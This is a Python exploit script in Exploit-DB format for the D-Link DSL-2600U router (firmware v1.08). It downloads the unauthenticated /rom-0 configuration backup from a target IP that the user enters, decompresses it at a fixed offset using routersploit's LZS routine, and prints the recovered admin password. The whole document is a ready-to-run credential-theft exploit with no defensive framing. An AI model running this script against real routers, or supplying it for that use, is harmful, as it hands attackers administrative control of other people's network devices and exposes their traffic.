# Exploit Title: D-Link DSL2600U - 'rom-0' Admin Password Disclosure
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://www.dlink.com
# Version: DSL-2600U
# Tested on: ubuntu
# CVE : N/A
# Firmware Version: v1.08
from routersploit.libs.lzs.lzs import LZSDecompress
import requests
import re
import sys
print('''
    #################################################################################
    #        D-Link Router - 'rom-0' Admin Password Disclosure                      #
    #                   BY: Amir Hossein Jamshidi                                   #
    #               Mail: amirhosseinjamshidi64@gmail.com                           #
    #           github: https://github.com/amirhosseinjamshidi64                    #
    #                    Usage: python expoit.py                                    #
    #################################################################################
''')
def exploit(url):
    data = requests.get(f"{url}/rom-0")
    #with open("data", 'wb') as f:
    #    f.write(data.content)
    data = data.content
    pos = 8568
    res, win = LZSDecompress(data[pos:])
    password = re.findall("([\040-\176]{5,})", res)
    return password[0]
if __name__ == "__main__":
    url = input("Enter Target IP (example: http://192.168.1.1): ")
    print("password is: " + '\t' + exploit(url))